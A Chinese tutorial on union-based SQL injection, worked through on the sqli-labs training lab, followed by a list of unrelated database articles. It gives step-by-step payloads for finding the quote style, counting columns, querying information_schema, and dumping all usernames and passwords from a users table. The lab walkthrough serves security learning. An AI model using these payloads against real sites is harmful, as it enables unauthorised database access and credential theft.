Simon_Smith
Simon_Smith

★SQL注入漏洞(2)注入方法2 union联合注入

1.估算目标的数据库语法(可能性很多)

select username,password from tablex where id=' 2\  ' limit 0,1
select username,password from tablex where id=2  limit 0,1
select username,password from tablex where id=(2)  limit 0,1

2.黑客需要破坏数据库语句  目的是为了知道数据库的闭合方式 一旦出现报错即破环成功

这个世界上所有的闭合方式     

   '    " () ('x') (('x')) ("x") (("x")) (())    没有任何闭合方式的 

//第一个是反引号  键盘上1左边的那个 `

反引号是数据库认可的特殊字符 他会把之中的内容当做一个表而不是内容

原理:例子如下 table是数据库中的关键字 所以这样写即使语法正确也执行失败 是为了区分采用的反引号引库名  假如库名叫from呢?

最好数据库的库名不要取得敏感词 否则要用反引号来引起敏感词

★SQL注入漏洞(2)注入方法2 union联合注入_第1张图片

举例:         ''3'' LIMIT 0,1 '     

以上是sqli-labs第一关的报错信息 说明他的语法会有id='X'  所以可以把头尾一对引号删除掉 3' 是输入进来的 故是单引号闭合的

原来的语句应该是

select username,password from tablex where id='2'  limit 0,1

输入后的报错语句是:  多了一个引号 所以报错了

select username,password from tablex where id='2''  limit 0,1

\     转义字符,把自身后面的第一个东西变成字符串

select username,password from tablex where id=' 2\' limit 0,1

★SQL注入漏洞(2)注入方法2 union联合注入_第2张图片

select username,password from tablex where id=' 2\' limit 0,1

会导致闭合失败,从而报错,爆出闭合的内容  所以知道了闭合方式是'闭合 单引号闭合

3.查询正确说明完成闭合:  输入的2后面的引号会和前面id=的引号成对闭合 --+会注释掉后面全部的内容 也就不会报错了

select username,password from tablex where id=' 2' --+ ' limit 0,1

select username,password from tablex where id=' 2'           //数据库执行的时候就是这样的结果

4.确定有多少个栏目

id=2' order by [数字] --+

select id,username,password from tablex where id=' 2' order by 10 --+    //完整语句  --+后面的内容都被注释了 就不用多管了

发现order by 3   3及以下都正常 大于3会报错 说明3就是最大的列数 说明他数据库里有3个栏目

5.显示报错位

union select 1,2,3 --+

由于前面id=2正确显示的内容已经覆盖掉内容 所以我们要让前面报错/数据库查不到前面的内容 这样我们的1,2,3就可以显示了

index.php?id=-2' union select 1,2,3 --+

本质数据库接收到的语法:

select id,username,password from tablex where id=' -2' union select 1,2,3 --+ ' limit 0,1

★SQL注入漏洞(2)注入方法2 union联合注入_第3张图片

原理:union select 前面的内容是错误的他就会延续执行后面的内容 但是如果前面的正确,1,2,3只能被放在末尾

★SQL注入漏洞(2)注入方法2 union联合注入_第4张图片

6.注入数据库的内容(结合数据库语句中的函数)库->表->列->字段

注意:数据库中有一个information_schema库  其中有colums和tables的表 相当于一个登记用的户口本  添加了数据库中添加的所有表和列 所有的操作

原理:只要知道数据库名 就可以通过这个information_schema数据库查到我们需要的数据的表名和列名 之后进而查询到数据

information_schema 索引数据库    系统自带的    mysql5.0+自带的    优点:查询速度更快 不过更不安全

★SQL注入漏洞(2)注入方法2 union联合注入_第5张图片

id=-2' union select 1,database(),3 --+          查看数据库的库名  // 库名是security

id=-2' union select 1,table_name,3 from information_schema.tables where table_schema = 'security' limit 0,1 --+   根据库名找到表名

之后修改limit 0,1为  limit 1,1  之后为limit 2,1即可

查到表名emails,referers,uagents,users

也可以通过group_concat来直接一步到位 那就不需要写limit了

id=-2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+

也可以写成:  这样表明就不用先查了,直接用函数去查询

id=-2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() --+

★SQL注入漏洞(2)注入方法2 union联合注入_第6张图片

★SQL注入漏洞(2)注入方法2 union联合注入_第7张图片

黑客觉得users里面的数据很有价值 接下来利用colums来查询其中的列名

id=-2' union select 1,column_name,3 from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 0,1 --+
id=-2' union select 1,column_name,3 from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1 --+
id=-2' union select 1,column_name,3 from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 2,1 --+

发现users里有id,username,password

也可以写成: 如果不写table_schema这个限制条件 就会在整个数据库直接查table_name 这样就可能因为有表的重复而导致查询错误

id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" and table_name="users" --+ 

★SQL注入漏洞(2)注入方法2 union联合注入_第8张图片

黑客需要拿到所有的username和password的值  group_concat()是统一输出

id=-2' union select 1,group_concat(username),group_concat(password) from users  --+
id=-2' union select 1,group_concat(username,password),3 from users --+    //这个会比较乱,可以参考下面这种
id=-2' union select 1,group_concat(username.0x3a,password),3 from users --+    //mysql可以自动解析十六进制 0x3a是冒号的十六进制 ascii码定义的

也可以选择使用一条一条的方式输出:

id=-2' union select 1,username,password from users limit 0,1 --+
id=-2' union select 1,username,password from users limit 1,1 --+
id=-2' union select 1,username,password from users limit 2,1 --+

★SQL注入漏洞(2)注入方法2 union联合注入_第9张图片

你可能感兴趣的:(Web安全,sql,数据库,database)

  • OCP 认证专家零基础小白 leegong23111 oracle数据库
    对于零基础的学习者而言,OCP专家认证是完全可以攻克的目标,而且其价值不可估量。从学习的角度来看,它为你提供了一套系统且全面的数据库知识体系。Oracle数据库作为行业内的领军者,其技术的深度和广度足以让你深入了解数据库的原理、架构、设计、管理与优化等各个关键环节。学习过程虽然充满挑战,但就像攀爬一座高峰,每一步的艰辛都伴随着知识积累的喜悦,当你逐渐掌握这些核心技能时,你会发现自己已经拥有了进入I
  • 使用Node.js实现RESTful API chiwan3432 json开发工具ruby
    RESTful基础概念REST(RepresentationalStateTransfer)描述了一个架构样式的网络系统,它首次出现在2000年RoyFielding的博士论文中。在REST服务中,应用程序状态和功能可以分为各种资源。资源向客户端公开,客户端可以对资源进行增删改操作。资源的例子有:应用程序对象、数据库记录、算法等等。REST通过抽象资源,提供了一个非常容易理解和使用的API,它使用
  • 使用Python绘制MySQL数据图实现数据可视化 碧波浩渺· pythonmysql信息可视化Python
    在数据分析和可视化领域,Python是一种流行的编程语言,它提供了丰富的库和工具来处理和可视化数据。通过结合Python和MySQL数据库,我们可以从数据库中提取数据,并使用各种图表和图形展示数据的洞察力。本篇文章将介绍如何使用Python绘制MySQL数据图实现数据可视化。首先,我们需要确保已安装必要的库,包括mysql-connector-python和matplotlib。mysql-con
  • uniCloud云开发笔记一 萧寂173 uniapp笔记
    文章目录云空间配置创建云空间创建数据库项目连接云空间云函数创建和使用云数据库操作云函数通过传统方式操作数据库查查询全部数据查询数据总条数分页查询正序倒序查询查询字段过滤where查询正则表达式模糊搜索增单个新增批量新增改单个修改批量修改字段是数组或对象的修改更新操作符覆盖性修改(不会保留其他字段,修改时传什么字段这个数据就是什么)删单个删除条件删除(批量删除)云函数的上传和下载前端项目托管配置域名
  • 运维工程师的日常巡检内容 AustinCien linux
    服务器健康状态:检查服务器的硬件、操作系统和服务的运行状态,确保服务器正常工作并且没有异常。网络设备状态:检查网络交换机、路由器、防火墙等网络设备的连通性和运行状态,确保网络设备正常工作。存储设备空间:检查存储设备(如磁盘阵列、NAS等)的可用空间和使用率,及时处理存储空间不足的情况。数据库状态:检查数据库服务器的运行状态、连接数和查询性能,并进行必要的优化和维护。应用程序状态:检查应用程序服务器
  • k8s服务健康检查不通过一直重启 AustinCien kubernetes容器云原生
    健康检查不通过说明在默认的15分钟内平台没有拿到所有实例的健康页面先看报错提示,再看日志是否有程序类报错、数据库、中间件连接等的错误信息。如果无提示就从下面可能性找原因:原因一:由于应用的资源配额过低,导致应用启动慢,使启动时间超出健康检查时间解决:检查应用的CPU配额和内存配额,适当调大额度原因二:由于健康检查时间设置过短,使健康检查时间低于应用启动时间解决:检查健康检查的不健康阈值,适当调大阈
  • MySQL与NoSQL:数据库技术的双面选择与学习价值 码有余悸 数据库mysqlnosql
    很多同学可能在第一次接触NoSQL的时候会产生疑问?这个名字好像听过,跟MySQL是一个系列的吗?那么通过这篇文章,我来带你初步的认识一下NoSQL与MySQL的差异,以及为什么要学习NoSQL相关知识。如果大家对NoSQL的理解较为浅薄,可以在评论区中@,我会制作关于NoSQL的相关专栏供大家学习!希望今天的内容对大家有所帮助目录前言一、核心差异对比1.1数据建模范式1.2扩展策略1.3事务支持
  • 全面掌握Spring MVC+MyBatis+Maven框架实战指南 Hsmiau
    本文还有配套的精品资源,点击获取简介:SpringMVC、MyBatis和Maven结合形成了一套强大的JavaWeb开发框架,适用于中大型企业级应用开发。本课程将详细介绍如何利用这套框架组合进行项目构建和数据操作,包括SpringMVC的请求处理流程、MyBatis的SQL解耦和数据库交互,以及Maven的项目管理和依赖管理。通过实例解析,学生将学会如何搭建项目环境、配置依赖、编写代码并实现企业
  • YashanDB环境变量 数据库
    本章将展示数据库安装后的环境变量信息,具体以安装生成值为准。如下为使用永久生效方法配置的环境变量信息:exportYASDB_HOME=/data/yashan/yasdb_home/yashandb/23.3.1.100exportPATH=${YASDB_HOME}/bin:$PATHexportLD_LIBRARY_PATH=${YASDB_HOME}/lib:$LD_LIBRARY_PAT
  • YashanDB用户操作 数据库
    本章节将介绍YashanDB数据库用户相关的基本操作。创建用户执行如下SQL命令创建新用户yashan,并为其指定密码yashan:CREATEUSERyashanIDENTIFIEDBYyashan;创建角色执行如下SQL命令创建新角色yashan_role:CREATEROLEyashan_role;授权用户执行如下SQL命令为用户yashan授予登录会话和创建资源的权限:GRANTCONNE
  • YashanDB实例启停 数据库
    本章节将介绍YashanDB数据库的实例启停方式。数据库安装过程中将实例自动切换成OPEN阶段,并创建名为yashandb的数据库。执行如下SQL命令查看当前实例状态及数据库名称:SELECTstatusFROMV$INSTANCE;STATUS-----------------OPENSELECTdatabase_nameFROMV$DATABASE;DATABASE_NAME---------
  • SQLMesh 系列教程10- 外部模型(External Models) 梦想画家 数据分析工程#python数据工程sqlmesh
    在数据分析和建模过程中,外部模型(ExternalModels)在SQLMesh中扮演着重要角色。外部模型允许用户引用外部数据源或现有数据库表,从而实现灵活的数据整合和分析。本文将介绍外部模型的定义、生成方法(包括使用CLI和YAML文件)、审计功能,以及如何在实际项目中应用外部模型。通过一个具体的示例,我们将展示如何定义和使用外部模型来分析客户数据,帮助用户更好地理解和利用SQLMesh的强大功
  • 人工智能和云时代的五大DBA关注点 人工智能dba
    数据库管理员(DBA)的角色在不断演变,以适应技术和应用开发方式的变化。过去,DBA主要侧重于管理物理硬件和软件,而现在,他们发现自己正在驾驭由云技术、人工智能驱动的自动化以及不断增长的数据所构成的复杂情况。2025年伊始,让我们来探讨一下让DBA夜不能寐的五大问题。数据安全和隐私数据泄露事件不断成为头条新闻,其后果可能是毁灭性的。DBA站在保护敏感信息的第一线。根据IBM最近的一项研究,数据泄露
  • MQX - 基于 MySQL 的轻量级消息队列
    MQX是一个基于MySQL的轻量级消息队列实现,以Go语言库的形式提供服务,无需额外部署消息服务器。1.项目介绍项目背景在中小型项目中,经常需要使用消息队列来解耦服务,但部署维护专门的消息中间件(如RocketMQ、Kafka)会带来额外的运维成本。MQX基于MySQL实现消息队列功能,复用现有的MySQL基础设施,降低系统复杂度。核心特性零部署:作为Go语言库集成,无需部署额外服务消息可靠:基于
  • 使用 Airbyte 数据集成平台加载 Shopify 数据 fgayif python
    技术背景介绍Airbyte是一个用于API、数据库及文件到仓库和数据湖的ELT管道的数据集成平台。它拥有最全的ELT连接器目录,为各种数据源提供强大支持。本文将介绍如何通过Airbyte平台的Shopify连接器加载数据。核心原理解析Airbyte的Shopify连接器将Shopify数据的各种对象作为文档加载,并将其存储为元数据。通过这种方式,可以方便地将Shopify的订单等信息整合到数据仓库
  • 有哪些开源大数据处理项目使用了大模型 魔王阿卡纳兹 大数据治理与分析开源大数据数据清洗
    以下是一些使用了大模型的开源大数据处理项目:1.**RedPajama**:这是一个开源项目,使用了LLM大语言模型数据处理组件,对GitHub代码数据进行清洗和处理。具体流程包括数据清洗、过滤低质量样本、识别和删除重复样本等步骤。2.**SWIFT**:阿里开源的大模型微调轻量级框架,用于提高RAG应用的准确度。3.**Text2SQL**:阿里发布的最新实践开源模型,其准确度超过了GPT4。4
  • 网络安全-系统层攻击流程及防御措施 星河776(重名区分) 网络安全web安全安全
    系统层攻击流程涉及多个阶段,攻击者通过逐步渗透以获取控制权或窃取数据。以下是详细的流程及防御措施:1.侦察(Reconnaissance)信息收集:主动扫描:使用工具如Nmap、Masscan扫描目标IP、开放端口、服务版本。被动侦察:通过公开资源(Shodan、Censys)或DNS记录获取系统信息。漏洞匹配:比对CVE、Exploit-DB等数据库,寻找已知漏洞(如ApacheLog4j漏洞)
  • spring JdbcTemplate 在itest 开源测试管理项目中的浅层(5个使用场景)封装 Codes_AndyLiu 软件测试开源测试管理软件
    导读:主要从4个方面来阐述,1:背景;2:思路;3:代码实现;4:使用一:封装背景,在做项目的时候,用的JPA,有些复杂查询,比如报表用原生的JdbcTemplate,很不方便;传参也不方便,如果参数多;需要增加分页功能,以及结果集自动转对像等5个常用功能,见第4节。下面两个图是开源测试管理软件itest的统计功能,因为SQL复杂,有些有200行,所以才有后面的JdbcTemplateWrappe
  • 什么是RAG?RAG是如何解决问题的?RAG的未来发展趋势有哪些? 大模型综述 人工智能开发语言大模型AGIaiRAG自然语言处理
    一、什么是RAG所谓RAG,检索增强生成(RetrievalAugmentedGeneration),简称RAG,已经成为当前最火热的LLM应用方案。通俗点说:就是通过自有垂域数据库检索相关信息,然后合并成为提示模板,给大模型生成漂亮的回答。二、为什么会出现RAGRAG的出现,是因为在大模型的广泛应用中,伴随着出现的一些问题,比如:知识的局限性:模型自身的知识完全源于它的训练数据,而现有的主流大模
  • 好用的5款漏洞扫描工具推荐! 网安-轩逸 web安全安全网络安全linux
    漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测的行为,也是网络安全领域中非常重要的环节。本文为大家推荐5款常用的开源漏洞扫描工具,一起来看看吧。1、NmapNmap是一款非常流行的自动化安全测试工具。它可以在各种主流操作系统上运行,并快速扫描大型网络。它通常会检测以下信息:网络上有哪些主机可用,主机在运行什么服务,主机在运行
  • mysqldump命令 logfile
    使用mysqldump命令导出MySQL数据库在数据库管理中,定期备份数据是不可或缺的一部分。mysqldump是MySQL提供的一个工具,它可以用于导出数据库的备份文件。本文将向你介绍如何使用mysqldump命令,并将备份日志文件保存到指定位置。我们将通过简单的步骤和代码示例来帮助你理解这个过程。整个流程接下来,我们会展示整个流程,包括你需要完成的步骤和相关代码。步骤说明1.准备MySQL数据
  • 如何用Java校验SQL语句的合法性 master_chenchengg 能力提升面试宝典技术IT信息化
    如何用Java校验SQL语句的合法性SQL语句基础与常见错误类型使用Java解析SQL语句的基本方法通过JDBC执行预编译语句验证SQL合法性应用第三方库如JSqlParser进行SQL语法检查实现自定义SQL校验规则以增强安全性处理动态SQL生成及校验的挑战与解决方案在Java应用中集成SQL校验的最佳实践探讨SQL注入防护策略与Java中的实现方式SQL语句基础与常见错误类型在讨论如何使用Ja
  • 深度分页实践 YMY-up 项目实践数据分页
    深度分页:查询偏移量过大的场景,这会导致查询性能较低#MySQL在无法利用索引的情况下跳过1000000条记录后,再获取10条记录SELECT*FROMt_orderORDERBYidLIMIT1000000,10优化方案:范围查询当可以保证ID的连续性时,用户根据ID范围进行分页是比较好的解决方案:SELECT*FROMt_orderWHEREid>100000ANDid100000LIMIT1
  • Sqlserver安全篇之_隐藏实例功能和禁用SQL Server Browser服务 lusklusklusk sqlserversqlserver安全数据库
    总结:1、隐藏实例功能和禁用SQLServerBrowser服务的功能一样,对应非默认实例(且这个默认实例是1433端口)的情况下,都是需要在连接字符串中提供端口号才能连接到实例2、隐藏实例功能后,就算开启了SQLServerBrowser服务,SQLServerBrowser服务也无法识别计算机上的所有SQLServer实例的端口和命名管道隐藏实例https://learn.microsoft.
  • 腾讯SQL面试题变体实现:最长连续天数与允许1天中断的进阶解法 数据大包哥 #大厂SQL面试指南sql数据库大数据
    腾讯SQL面试题变体实现:最长连续天数与允许1天中断的进阶解法作者:某七年数据开发工程师|2025年02月23日关键词:滑动窗口、容错机制、连续区间优化一、变体题型需求分析在原题如何找出连续5天涨幅超过5%的股票基础上,需实现两个扩展场景:最长连续天数:输出每只股票历史上连续涨幅≥5%的最长天数允许1天中断:筛选连续5天中有≥4天达标(允许1天不达标)的股票业务价值:前者用于评估股票动量强度,后者
  • python 生成excel scan724
    #!/usr/bin/envpython#-*-coding:utf-8-*-importMySQLdbfromdatetimeimportdatetimeimportcx_Oracleimportosimportxlwtimportsysreload(sys)sys.setdefaultencoding('utf-8')os.environ['NLS_LANG']='SIMPLIFIEDCHIN
  • 【集宁师范学院毕业论文】小区物业管理系统的设计与实现 毕设指导Martin 数据库智能手机springbootjavaoracle后端科技
    注:仅展示部分文档内容和系统截图,需要完整的视频、代码、文章和安装调试环境请私信up主。摘要本文主要展示了小区物业管理系统的设计与开发过程。小区物业管理系统是将所涉及到的小区管理事务利用计算机技术组织起来,实现小区事务方便高效的管理,同时极大地方便了小区住户的日常生活.本系统采用近几年新兴的C#语言作为编程语言和发展日趋成熟的ASP.NET技术作为创建应用程序的方式,并且使用微软公司的SQLSer
  • mongodb常用操作命令 行思理 数据库mongodb数据库
    1、MongoDBShell工具mongosh一般的链接命令格式为:mongosh"mongodb://hostname:port"示例:mongosh"mongodb://localhost:27017"2、显示所有数据库showdbs或者showdatabases3、切换到指定数据库(如果不存在则创建):use4、删除当前数据库:db.dropDatabase()5、查看当前所使用的数据库db
  • MongoDB 数据库简介 wjs2024 开发语言
    MongoDB数据库简介引言随着互联网技术的飞速发展,数据已经成为企业的重要资产。为了高效地管理和处理这些数据,数据库技术应运而生。MongoDB作为一种流行的NoSQL数据库,因其灵活的数据模型和高效的数据处理能力,受到了广泛的关注。本文将为您详细介绍MongoDB的基本概念、特点、应用场景以及操作方法。MongoDB概述MongoDB是一个基于分布式文件系统的NoSQL数据库,由10gen公司
  • Nodejs + MongoDB 快速构建Web应用 (入门级教程) AI天才研究院 Python实战深度学习实战自然语言处理人工智能语言模型编程实践开发语言架构设计
    作者:禅与计算机程序设计艺术1.简介本教程从零开始,带领大家学习如何使用Nodejs和MongoDB快速搭建一个简单的Web应用程序。涵盖的内容包括:使用Nodejs搭建本地服务器安装MongoDB并连接到本地服务器使用Express构建后端API接口配置路由和中间件使用Mongoose连接数据库和管理数据模型使用模板引擎(EJS)渲染视图页面用户注册、登录和身份验证文件上传与下载功能通过Sock
  • mondb入手 木zi_鸣 mongodb
    windows 启动mongodb  编写bat文件, mongod --dbpath D:\software\MongoDBDATA mongod --help  查询各种配置 配置在mongob 打开批处理,即可启动,27017原生端口,shell操作监控端口  扩展28017,web端操作端口 启动配置文件配置, 数据更灵活 
  • 大型高并发高负载网站的系统架构 bijian1013 高并发负载均衡
            扩展Web应用程序 一.概念         简单的来说,如果一个系统可扩展,那么你可以通过扩展来提供系统的性能。这代表着系统能够容纳更高的负载、更大的数据集,并且系统是可维护的。扩展和语言、某项具体的技术都是无关的。扩展可以分为两种:         1.
  • DISPLAY变量和xhost(原创) czmmiao display
    DISPLAY 在Linux/Unix类操作系统上, DISPLAY用来设置将图形显示到何处. 直接登陆图形界面或者登陆命令行界面后使用startx启动图形, DISPLAY环境变量将自动设置为:0:0, 此时可以打开终端, 输出图形程序的名称(比如xclock)来启动程序, 图形将显示在本地窗口上, 在终端上输入printenv查看当前环境变量, 输出结果中有如下内容:DISPLAY=:0.0
  • 获取B/S客户端IP 周凡杨 java编程jspWeb浏览器
       最近想写个B/S架构的聊天系统,因为以前做过C/S架构的QQ聊天系统,所以对于Socket通信编程只是一个巩固。对于C/S架构的聊天系统,由于存在客户端Java应用,所以直接在代码中获取客户端的IP,应用的方法为:    String ip = InetAddress.getLocalHost().getHostAddress(); 然而对于WEB
  • 浅谈类和对象 朱辉辉33 编程
        类是对一类事物的总称,对象是描述一个物体的特征,类是对象的抽象。简单来说,类是抽象的,不占用内存,对象是具体的, 占用存储空间。     类是由属性和方法构成的,基本格式是public  class 类名{ //定义属性 private/public 数据类型 属性名; //定义方法 publ
  • android activity与viewpager+fragment的生命周期问题 肆无忌惮_ viewpager
    有一个Activity里面是ViewPager,ViewPager里面放了两个Fragment。 第一次进入这个Activity。开启了服务,并在onResume方法中绑定服务后,对Service进行了一定的初始化,其中调用了Fragment中的一个属性。 super.onResume(); bindService(intent, conn, BIND_AUTO_CREATE);
  • base64Encode对图片进行编码 843977358 base64图片encoder
    /** * 对图片进行base64encoder编码 * * @author mrZhang * @param path * @return */ public static String encodeImage(String path) { BASE64Encoder encoder = null; byte[] b = null; I
  • Request Header简介 aigo servlet
    当一个客户端(通常是浏览器)向Web服务器发送一个请求是,它要发送一个请求的命令行,一般是GET或POST命令,当发送POST命令时,它还必须向服务器发送一个叫“Content-Length”的请求头(Request   Header)   用以指明请求数据的长度,除了Content-Length之外,它还可以向服务器发送其它一些Headers,如:    
  • HttpClient4.3 创建SSL协议的HttpClient对象 alleni123 httpclient爬虫ssl
    public class HttpClientUtils { public static CloseableHttpClient createSSLClientDefault(CookieStore cookies){ SSLContext sslContext=null; try { sslContext=new SSLContextBuilder().l
  • java取反 -右移-左移-无符号右移的探讨 百合不是茶 位运算符 位移
    取反: 在二进制中第一位,1表示符数,0表示正数 byte a = -1; 原码:10000001 反码:11111110 补码:11111111 //异或: 00000000 byte b = -2; 原码:10000010 反码:11111101 补码:11111110 //异或: 00000001
  • java多线程join的作用与用法 bijian1013 java多线程
            对于JAVA的join,JDK 是这样说的:join public final void join (long millis )throws InterruptedException Waits at most millis milliseconds for this thread to die. A timeout of 0 means t
  • Java发送http请求(get 与post方法请求) bijian1013 javaspring
    PostRequest.java package com.bijian.study; import java.io.BufferedReader; import java.io.DataOutputStream; import java.io.IOException; import java.io.InputStreamReader; import java.net.HttpURL
  • 【Struts2二】struts.xml中package下的action配置项默认值 bit1129 struts.xml
    在第一部份,定义了struts.xml文件,如下所示:   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache.org/dtds/struts
  • 【Kafka十三】Kafka Simple Consumer bit1129 simple
    代码中关于Host和Port是割裂开的,这会导致单机环境下的伪分布式Kafka集群环境下,这个例子没法运行。 实际情况是需要将host和port绑定到一起,   package kafka.examples.lowlevel; import kafka.api.FetchRequest; import kafka.api.FetchRequestBuilder; impo
  • nodejs学习api ronin47 nodejs api
    NodeJS基础 什么是NodeJS JS是脚本语言,脚本语言都需要一个解析器才能运行。对于写在HTML页面里的JS,浏览器充当了解析器的角色。而对于需要独立运行的JS,NodeJS就是一个解析器。 每一种解析器都是一个运行环境,不但允许JS定义各种数据结构,进行各种计算,还允许JS使用运行环境提供的内置对象和方法做一些事情。例如运行在浏览器中的JS的用途是操作DOM,浏览器就提供了docum
  • java-64.寻找第N个丑数 bylijinnan java
    public class UglyNumber { /** * 64.查找第N个丑数 具体思路可参考 [url] http://zhedahht.blog.163.com/blog/static/2541117420094245366965/[/url] * 题目:我们把只包含因子 2、3和5的数称作丑数(Ugly Number)。例如6、8都是丑数,但14
  • 二维数组(矩阵)对角线输出 bylijinnan 二维数组
    /** 二维数组 对角线输出 两个方向 例如对于数组: { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 9, 10, 11, 12 }, { 13, 14, 15, 16 }, slash方向输出: 1 5 2 9 6 3 13 10 7 4 14 11 8 15 12 16 backslash输出: 4 3
  • [JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新) comsci 工作流
       既然是做开源软件的,我们的宗旨就是给大家分享设计和代码,那么现在我就用很简单扼要的语言来透露这个跳跃模式的设计原理    大家如果用过JWFD的ARC-自动运行控制器,或者看过代码,应该知道在ARC算法模块中有一个函数叫做SAN(),这个函数就是ARC的核心控制器,要实现跳跃模式,在SAN函数中一定要对LN链表数据结构进行操作,首先写一段代码,把
  • redis常见使用 cuityang redis常见使用
    redis 通常被认为是一个数据结构服务器,主要是因为其有着丰富的数据结构 strings、map、 list、sets、 sorted sets 引入jar包 jedis-2.1.0.jar  (本文下方提供下载) package redistest; import redis.clients.jedis.Jedis; public class Listtest
  • 配置多个redis dalan_123 redis
    配置多个redis客户端 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi=&quo
  • attrib命令 dcj3sjt126com attr
      attrib指令用于修改文件的属性.文件的常见属性有:只读.存档.隐藏和系统.    只读属性是指文件只可以做读的操作.不能对文件进行写的操作.就是文件的写保护.    存档属性是用来标记文件改动的.即在上一次备份后文件有所改动.一些备份软件在备份的时候会只去备份带有存档属性的文件. 
  • Yii使用公共函数 dcj3sjt126com yii
    在网站项目中,没必要把公用的函数写成一个工具类,有时候面向过程其实更方便。 在入口文件index.php里添加 require_once('protected/function.php'); 即可对其引用,成为公用的函数集合。 function.php如下:   <?php /**   * This is the shortcut to D
  • linux 系统资源的查看(free、uname、uptime、netstat) eksliang netstatlinux unamelinux uptimelinux free
    linux 系统资源的查看 转载请出自出处:http://eksliang.iteye.com/blog/2167081   http://eksliang.iteye.com 一、free查看内存的使用情况 语法如下:   free [-b][-k][-m][-g] [-t] 参数含义 -b:直接输入free时,显示的单位是kb我们可以使用b(bytes),m
  • JAVA的位操作符 greemranqq 位运算JAVA位移<<>>>
    最近几种进制,加上各种位操作符,发现都比较模糊,不能完全掌握,这里就再熟悉熟悉。   1.按位操作符 :    按位操作符是用来操作基本数据类型中的单个bit,即二进制位,会对两个参数执行布尔代数运算,获得结果。    与(&)运算:    1&1 = 1, 1&0 = 0, 0&0 &
  • Web前段学习网站 ihuning Web
      Web前段学习网站 菜鸟学习:http://www.w3cschool.cc/   JQuery中文网:http://www.jquerycn.cn/   内存溢出:http://outofmemory.cn/#csdn.blog   http://www.icoolxue.com/   http://www.jikexue
  • 强强联合:FluxBB 作者加盟 Flarum justjavac r
    原文:FluxBB Joins Forces With Flarum作者:Toby Zerner译文:强强联合:FluxBB 作者加盟 Flarum译者:justjavac FluxBB 是一个快速、轻量级论坛软件,它的开发者是一名德国的 PHP 天才 Franz Liedke。FluxBB 的下一个版本(2.0)将被完全重写,并已经开发了一段时间。FluxBB 看起来非常有前途的,
  • java统计在线人数(session存储信息的) macroli javaWeb
    这篇日志是我写的第三次了 前两次都发布失败!郁闷极了!   由于在web开发中常常用到这一部分所以在此记录一下,呵呵,就到备忘录了! 我对于登录信息时使用session存储的,所以我这里是通过实现HttpSessionAttributeListener这个接口完成的。 1、实现接口类,在web.xml文件中配置监听类,从而可以使该类完成其工作。 public class Ses
  • bootstrp carousel初体验 快速构建图片播放 qiaolevip 每天进步一点点学习永无止境bootstrap纵观千象
    img{ border: 1px solid white; box-shadow: 2px 2px 12px #333; _width: expression(this.width > 600 ? "600px" : this.width + "px"); _height: expression(this.width &
  • SparkSQL读取HBase数据,通过自定义外部数据源 superlxw1234 sparksparksqlsparksql读取hbasesparksql外部数据源
    关键字:SparkSQL读取HBase、SparkSQL自定义外部数据源     前面文章介绍了SparSQL通过Hive操作HBase表。   SparkSQL从1.2开始支持自定义外部数据源(External DataSource),这样就可以通过API接口来实现自己的外部数据源。这里基于Spark1.4.0,简单介绍SparkSQL自定义外部数据源,访
  • Spring Boot 1.3.0.M1发布 wiselyman spring boot
        Spring Boot 1.3.0.M1于6.12日发布,现在可以从Spring milestone repository下载。这个版本是基于Spring Framework 4.2.0.RC1,并在Spring Boot 1.2之上提供了大量的新特性improvements and new features。主要包含以下:   1.提供一个新的sprin
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他